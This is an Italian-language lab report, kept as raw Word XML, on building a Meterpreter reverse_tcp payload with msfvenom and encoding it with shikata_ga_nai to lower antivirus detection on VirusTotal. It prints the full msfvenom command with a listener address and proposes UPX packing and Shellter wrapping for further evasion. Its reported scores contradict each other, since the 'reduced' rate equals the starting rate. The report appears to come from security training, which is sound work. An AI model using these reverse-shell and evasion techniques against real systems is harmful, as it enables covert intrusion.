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0et3g9p0c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Relazione sull'Offuscamento del Payload e Riduzione del Rilevamento Antivirus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1wkzhjlbg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Obiettivo dell'esercizio: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L'obiettivo di questo esercizio è stato quello di generare un payload utilizzando </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">msfvenom</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">, applicare tecniche di offuscamento per migliorare la non rilevabilità del payload sui motori antivirus e testare il tasso di rilevamento su VirusTotal. Il payload scelto è un </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Meterpreter reverse_tcp</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> destinato a una macchina Windows a 32 bit (x86). La sfida è stata quella di ridurre il numero di rilevamenti antivirus, utilizzando una serie di tecniche avanzate di offuscamento.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81qkb92fj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Passaggi seguiti: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Generazione del Payload di Base con msfvenom</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">: Il primo passo è stato generare un payload di base utilizzando </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">msfvenom</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">, specificando il tipo di payload, l'indirizzo IP del listener e la porta di ascolto. Il comando iniziale era il seguente:</w:t>
        <w:br w:type="textWrapping"/>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve"> msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.4 LPORT=4444 -a x86 --platform windows -e x86/shikata_ga_nai -i 100 -o payload_mio.exe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-p windows/meterpreter/reverse_tcp</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">: Questo è il tipo di payload che abbiamo scelto. Si tratta di una shell Meterpreter inversa, che si connette al nostro sistema di controllo.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LHOST=192.168.1.4</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">: Indica l'indirizzo IP della nostra macchina Kali, che agirà come server di ascolto per il payload.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LPORT=4444</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">: La porta su cui il listener di Metasploit ascolta per le connessioni in entrata.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-a x86</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">: La macchina target è a 32 bit (architettura x86).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--platform windows</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">: La piattaforma target è Windows.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 x86/shikata_ga_nai</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">: Questo è l'encoder utilizzato per offuscare il payload. </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Shikata_ga_nai</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> è un encoder polimorfico che maschera il payload rendendolo meno rilevabile dai motori antivirus.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-i 100</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">: Il numero di iterazioni dell'encoder. Maggiore è il numero di iterazioni, più complesso sarà l'output del payload, quindi meno probabile che venga rilevato dagli antivirus.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-o payload_mio.exe</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">: Il file di output del payload è chiamato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payload_mio.exe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del Payload su VirusTotal</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">: Una volta generato il payload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payload_mio.exe</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">, il passo successivo è stato caricarlo su </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">VirusTotal</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> per verificare quanti motori antivirus rilevano la minaccia. Il file ha ottenuto un punteggio di </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">9/62</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> (9 motori antivirus su 62 lo hanno rilevato come una minaccia), il che indica che il payload era relativamente sicuro, ma c'era ancora spazio per miglioramenti.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Tecniche di Offuscamento Aggiuntive</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">: Poiché il nostro obiettivo era ridurre ulteriormente il tasso di rilevamento, sono state esplorate altre tecniche di offuscamento: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Encoder Multipli e Iterazioni Aumentate</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">: Sebbene il payload iniziale avesse già l'encoder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shikata_ga_nai</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">, abbiamo provato ad aumentare il numero di iterazioni da 20 a 100, per ottenere un livello di offuscamento ancora maggiore. Questo aiuta a camuffare il codice e a ridurre la possibilità di essere identificato da antivirus basati su firme statiche.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di Encoder Diversi</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">: Abbiamo esplorato anche altri encoder, come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x86/xor_dynamic</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">, che combina operazioni XOR dinamiche con altre tecniche di offuscamento. Tuttavia, nonostante i tentativi di aggiungere encoder diversi, non abbiamo riscontrato una riduzione significativa nei tassi di rilevamento rispetto all'uso di un singolo encoder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shikata_ga_nai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Analisi dei Risultati</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">: Dopo aver applicato l'encoder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shikata_ga_nai</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> con 100 iterazioni, abbiamo eseguito nuovamente il test su </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">VirusTotal</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">. Il tasso di rilevamento è stato ridotto a </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">9/62</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">, il che suggerisce che il nostro payload era già piuttosto offuscato, ma c'era ancora spazio per miglioramenti. Test successivi con l'aggiunta di UPX o la compressione del payload potrebbero ulteriormente abbassare il tasso di rilevamento.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fvucy7ikh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Conclusioni e Raccomandazioni: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risultato finale, con un tasso di rilevamento di 9/62, suggerisce che il payload è stato offuscato in modo efficace, ma non è completamente invisibile agli antivirus. Tuttavia, applicando ulteriori tecniche come l'uso di UPX per la compressione del file eseguibile, e continuando a testare con diverse combinazioni di encoder e iterazioni, possiamo ridurre ulteriormente il tasso di rilevamento.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UPX Compression</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">: L'utilizzo di UPX per comprimere il file può aggiungere uno strato di offuscamento aggiuntivo.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Shellter</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">: L'incapsulamento del payload in un programma innocuo con strumenti come </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Shellter</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> può anche ridurre il rilevamento.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generale, l'abilità di creare payloads più difficili da rilevare è cruciale per comprendere le tecniche utilizzate da attaccanti avanzati, ma è anche fondamentale essere consapevoli dell'etica e delle leggi in vigore quando si utilizzano queste tecniche.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